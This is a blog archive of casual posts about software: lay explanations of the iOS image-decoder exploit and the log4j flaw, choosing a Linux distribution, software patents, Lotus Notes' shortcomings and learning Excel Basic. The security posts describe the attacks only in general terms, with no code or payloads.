+++*

Symbolic Forest

A homage to loading screens.

Blog : Posts tagged with ‘software’

Teaching an image to think

Computers work in unexpected ways

Following on from yesterday’s post about log4j: another security article fascinated me in the last week, too. You might have already seen it, because it was widely shared on Twitter and computer people everywhere were amazed and aghast at its engineering and its possibilities. The log4j vulnerability is a relatively pedestrian one by comparison, using something that is an entirely documented and public feature of the library. This, on the other hand, is a completely different animal.

It’s a hack which lets you run code on a stranger’s iPhone just by sending them a message. They don’t have to click on anything, they don’t even have to open it, all their phone has to do is receive it and the hacker can take their phone over. At least, could: the fix for this security hole was fixed three months ago in iOS 14.8 and later. If you are running an older version of iOS on your phone or tablet, then, er, maybe don’t. The analysis of how this hack works, by Google Project Zero, has started to be published; and if you’re a programming nerd, it is beautiful and amazing and horrific in just the same way that a biological virus is.

In short, this hack relied on the fact that an iOS device, when it receives an animated GIF, tries to hack the GIF a little so it will always loop forever whatever the GIF itself actually says to do. It does this in an unhealthy way, though. When it opens the file to change it, it doesn’t matter if it’s not actually a GIF. The software will try to be clever and say “ah, looks like your file’s got the wrong name there, don’t worry, I still know how to open one of these” and do it. Even if it’s not a GIF and therefore doesn’t really need to.

Secondly, the hack relies on a bug in an open source PDF-reading library, in the part of the code used to open embedded images that are in an obscure and rather out-of-date format mostly used by fax machines. PDF is a big, complex and rambly format (believe me I know, I’ve been on-off trying to write a .NET PDF writing library for some years now) so it’s not surprising there are bugs and holes in PDF-reading software. What this hack does, though, is frankly brilliant. It uses the capabilities of the compression algorithm of this particular graphics format to implement an entire virtual CPU in the memory of the target device. It’s a small CPU but it is a Turing-complete one, which in technical terms mean that if you ignore practical limits of time and memory, it’s just as powerful as any other computer. An entire virtual CPU…created by feeding a carefully-designed image into a buggy image decompression routine.*

Frankly, if you’re a software developer, this is genius. Evil genius, to be sure, but genius nonetheless. I’m somewhat in awe of it, in a dirty way. It’s a wonderful level of lateral thinking, to know that the bug is there to exploit and work out a way to reach it and trip it up to begin with; and then to build an entire virtual machine from the basic Boolean logic operations available inside a particular image format. As I said above, it’s beautiful, it’s amazing, and it’s horrific in the original sense of the word. It’s awe-inspiring. I might be good at my job, but I can only look upon this with amazement and envy.

* I assume the image itself looks like just so much white noise if you could actually view it, but you can’t have everything. It reminds me a little of Neal Stephenson’s early-90s novel Snow Crash, in which a carefully-designed image that looks like white noise can hack the viewer’s brain.

Some logical relief

In which we discuss a topical flaw

In many ways I lead a charmed life and hold a wide range of privileges in my hand. Not least, this week just gone, the fact that I’m a software developer who generally works with the .NET software stack. More specifically, I am not a software developer who works with Java. Java developers have not, generally speaking, been having a good week.

This is all because of a software vulnerability discovered just over a week ago in a Java library called “log4j”. To summarise, for non-experts: “log4j” is a logging library. No, not the let’s-clear-the-rainforests sort. “Logging” means your software writing diagnostic information as it goes along: records such as “user etoainshrdlu asked to see their bank balance at 9.10am from this address with that web browser”. You can see why…

Regular reader E Shrdlu (from Clacton) writes: Oi! You can’t go around giving my bank balance to people!

Hush now, I was just using you as an example! You can see why it’s useful to have this information stored away somewhere, and log4j is a software library that makes it really easy to do. Virtually all Java server-side code out there uses log4j somewhere inside it, to handle this sort of thing.

Unfortunately, log4j has a few handy features that were originally intended to be useful features, but aren’t necessarily a good idea to have running on an internet-facing server that does important work such as process your banking requests. Particularly, in this case, if you put a certain specialist type of URL into a log record, log4j will see it, try to download another program from it, and will then run that program in a certain well-defined way. Of course, you might say, there’s nothing wrong with that because all of the log record messages are just written by the bank’s own software developers, so everything’s perfectly safe. However, as I said above, one thing they may very well be logging is which browser you happen to be using, because that’s very useful diagnostic data if people start having problems. “Which browser you happen to be using”, though, is just a field that you send them, and if you know what you’re doing, you can change it to whatever you want to. Including a special type of URL which will…well, hopefully you get the picture. And now you’re running whatever programs you like on one of your bank’s internal servers. Ah. You can see now why Java developers have not been having a good week.

The fix for this is straightforward, but rolling the fix out will have involved a huge proportion of the Java code running in the world being checked, double-checked, and redeployed when it’s known to be safe. Moreover, all of the developers doing this will have had several queries a day from their managers asking just how much they are exposed to this issue. I know: I’ve had several myself, even though my response is straightforwardly “we don’t run any Java code at all, so don’t worry.” I do tell them to tell the clients we have thoroughly and conscientiously audited our systems because from a client-relations point of view it does sound a bit more professional than “no, and our tech lead is very glad of their career choices”. But it still means plenty of messages for me to answer.

Incidentally, I don’t feel any sort of schadenfreude about this, in case you were wondering. I genuinely feel sorry for a lot of people I know, who will not have had a good week fixing this stuff. I’ve worked in big banks and other similar organisations, and I know a lot of former colleagues and current friends who will have spent the last week focusing on this above all else. It’s not nice when you are suddenly bowled by a risk like this; and moreover, it’s not as if Java is uniquely likely to suffer from this type of problem. There are nuances to this that I may come back to in a later post; but next time something like this happens, the person fixing it might well be me.

Hello, Operator

In which we consider switching OS

Right, that’s enough of politics. For now, at least, until something else pops up and ires me.

Back onto even shakier ground, so far as quasi-religious strength of feeling goes. I’m having doubts. About my operating system.

Back in about 1998 or so, I installed Linux on my PC. There was one big reason behind it: Microsoft Word 97. Word 97, as far as I can remember it, was a horribly bug-ridden release; in particular, when you printed out a long document, it would skip random pages. I was due to write a 12,000 word dissertation, with long appendices and bibliography,* and I didn’t trust Word to do it. I’d had a flatmate who had tackled the same problem using Linux and LaTeX, so I went down the same route. Once it was all set up, and I’d written a LaTeX template to handle the university’s dissertation- and bibliography-formatting rules, everything went smoothly. And I’ve been a happy Linux user ever since.

Now, I’m not going to move away from Linux. I like Linux, I like the level of control it gives me over the PC, and the only Windows-only programs I use run happily under Wine. What I’m not sure about, though, is the precise flavour of Linux I use.

For most of the past decade, I’ve used Gentoo Linux. I picked up on it about a year after it first appeared, and liked what I saw: it gives the system’s installer a huge amount of control over what software gets installed and how it’s configured. It does this in a slightly brutal way, by building a program’s binaries from scratch when it’s installed; but that makes it very easy to install a minimal system, or a specialist system, or a system with exactly the applications, subsystems and dependancies that you want.

There are two big downsides to this. Firstly, it makes installs and updates rather slow; on my 4-year-old computer, it can take a few hours to grind through an install of Gnome or X. Secondly, although the developers do their best, there’s no way to check the stability of absolutely every possible Gentoo installation out there, and quite frequently, when a new update is released, something will break.**

I’m getting a bit bored of the number of times in the last few months that I’ve done a big update, then find that something is broken. Sometimes, that something major is broken; only being able to log in via SSH, for example, because X can’t see my keyboard any more.*** It can be something as simple as a single application being broken, because something it depends on has changed. It turns “checking for updates” into a bit of a tedious multi-step process. I do like using Gentoo, but I’m wondering if life would be easier if I switched over to Ubuntu, or Debian, or some other precompiled Linux that didn’t have Gentoo’s dependancy problems.

So: should I change or should I go stay? Can I be bothered to do a full reinstall of everything? What, essentially, would I gain, that wouldn’t be gained from any nice, clean newly-installed computer? And is it worth losing the capacity to endlessly tinker that Gentoo gives you? I’m going to have to have a ponder.

UPDATE: thanks to K for pointing out that the original closing “should I change or should I go?” doesn’t really make much sense as a contrast.

* The appendices took up the majority of the page count, in the end, because of the number of illustrations and diagrams they contained.

** Before any Gentoo-lovers write in: yes, I am using stable packages, and I do read the news items every time I run “emerge –sync”

*** I was lucky there that SSH was turned on, in fact; otherwise I’d have had to start up and break into the boot sequence before GDM was started.

Legal news

In which Microsoft are on the good side for once

Legal news of the week: Microsoft has lost a patent infringement case brought by Alcatel, the company that owns the rights to the MP3. That is, they don’t own the file format itself, but they own the patent on understanding what they mean.

Now, normally, “Microsoft losing a court case” would be Good News for computer users everywhere, because Microsoft generally aren’t a very nice company and seem to spend most of their time thinking up new ways to extract money from people.* This case isn’t, though, because software patents are a bad thing, a bad thing indeed. If you’re a geek you can skip this next bit, because you’ll already know why they’re a bad thing.

Software is, basically, a list of instructions for doing arithmetic. Forget all the flashy graphics you see on the screen. Forget your email and your IM programs. Computers are machines for pushing numbers around,** and computer software is a list of instructions for doing that. Remember doing long division at school? That was essentially a list of steps for working out division sums that are too hard to do in your head – software for your brain, in other words.

Now, imagine if the inventor of long division*** had patented it. Every time you did a long division sum, you’d have to pay him a royalty. If you invented a machine to do long divisions for you, you’d have to pay a bloody big royalty. That’s how patents work.

Software patents are even worse, because often they involve access to data which is otherwise locked up. All those MP3 files on your computer? There’s no practical use for them without decoding software. Decoding software is patented. Microsoft thought they’d paid the patent holders for the right to write a decoder and sell it with Windows – but then the patent holder changed, and the new owner thought otherwise. The courts agreed with them.

Imagine if the first person who ever thought of the idea of reading a book in the bath had patented it. They managed to get a patent on the following: “run bath, select book, get in bath, pick up book, hold book in a cunning way to avoid getting it wet, read.” That’s no different, essentially, from a software patent that involves reading data from a file. If someone had done that, then you could only read a book in the bath if you’d licensed the right to do so. That’s why software patents are bad and wrong.

In more amusing legal news, the right-wing UK Independence Party has been told to return over £350,000 in illegal donations, made by a businessman who wasn’t registered to vote at the time. The party think the ruling is ridiculous. It shines a light, though, on the underside of their philosophy. There are rules there to ensure that only British people with a stake in British politics can fund political parties. UKIP think the ruling is silly because the man is obviously British even though he couldn’t prove he was a British voter. Which just goes to show that they’re not interested in proof or evidence or process; their definition of Britishness seems to be that you’re Someone Like Us.

* which, to be fair, is what capitalist companies are supposed to do.

** that’s why they’re called “computers”, and not “communicators” or “info-readers”, despite that being their main use.

*** apparently the sixteenth-century Yorkshire mathematician Henry Briggs, according to this lecture from his old college

On sucking

In which we discuss some design flaws in Lotus Notes

Spent quite a while last night reading Lotus Notes Sucks***, a collection of reasons why, as you could probably guess, Lotus Notes sucks. I have to use the thing at work every day, and it is indeed truly awful; but I didn’t really like the site. It lists 80-something superficial bad things about Lotus Notes, without listing any of the truly awful things about it.

Aside from the slightly smug nature of the site – every entry on it ends with “Conclusion: Lotus Notes Sucks”, repeated over and over again with the subtlety of a 10-ton cartoon weight – it’s written solely from the point of view of someone who uses Lotus Notes purely as an email program. That is, to be fair, probably what most people use it for; but that’s not what it is. It’s really a generic NoSQL non-relational database and data-sharing program that has been shoehorned into an email mould, and doesn’t properly fit. So, all the complaints are fairly trivial ones, and a lot boil down to: “it’s slightly different to Outlook”.

There are some true horrors inside Lotus Notes, if you ever have to do any programming or development work with it. The help files, for example, are all just specialised Notes data stores with a suitable interface on the front. This is completely fine, right up until you have a buggy bit of program code that you want to step through in the debugger.* If you’re running something in the debugger, you can’t access any other Notes data. Which, stupidly, includes the help files. Programmers have no access at all to the help files at the very time they’re most likely to need it.

There are other horrible things too. Things go wrong in unfixable ways. Files can mysteriously corrupt themselves and be unrepairable. If a file is deleted, shortcuts to it can become undeletable. If you accidentally delete half your email and ask your IT people to recover it from a backup, then unless IT knows the necessary cunning tricks,** when you open the backup copy of your mail file Notes will happily go “aha! this is the same datastore, but it’s out of date!” and delete everything in the backup too. Oh, joy. Lotus Notes Sucks doesn’t even mention some non-programming problems that I thought were obvious: you can’t search for empty fields, for example. You can search for documents where Field X contains “wibble”, no problem, but you can’t search for documents where Field X is blank. Well, you can do it if you’re a programmer and you write some code to do it for you, but there’s no way to trick the normal search interface into doing it.

In short, Lotus Notes is a horrible can of worms which will trip you up whenever you try to do something the programmers didn’t think of. So it’s a shame that Lotus Notes Sucks finds so many trivial surface-level problems with the email part of the program, when if you try to do more than just email with it, there are so many deeper faults lurking under the surface.

* Don’t worry if you don’t understand this. It means: run the program one line at a time so you can spot the point where it all goes wrong leading to your program falling over.

** Which we do, the second time someone does it, of course

*** Update, 27th August 2020: the site I originally linked to here has sadly disappeared.

Masochism

In which we go back to BASICs

No, I’m not a masochist.

I take a strange, geeky, masochistic pleasure, though, in making things hard for myself. In doing computer-based things the long way round. In solving the problems that are probably easy for some people, but hard for me. In learning new things just because it’s a new challenge.

Today, I was wrestling with a piece of Basic code in an Excel spreadsheet. I’ve not touched Basic since it had line numbers, which is a long long time ago, and I barely know any of it. I forced myself to work out, though, how to do what I wanted.* It was mentally hard work, and meant a lot of looking back and forth to the help pages, but I got it done in the end. It might not be written in the best way, the most efficient way, or the most idiomatic way.** But doing it was, strangely, fun.

* or, rather, what the consultant I was assisting wanted.

** for non-geeks: every computer language or system has its own programming idioms, which fit certain ways of programming particular problems. Someone used to language A will, on switching to language Z, often keep on programming in language A’s style even if this produces ugly and inefficient code in the other language.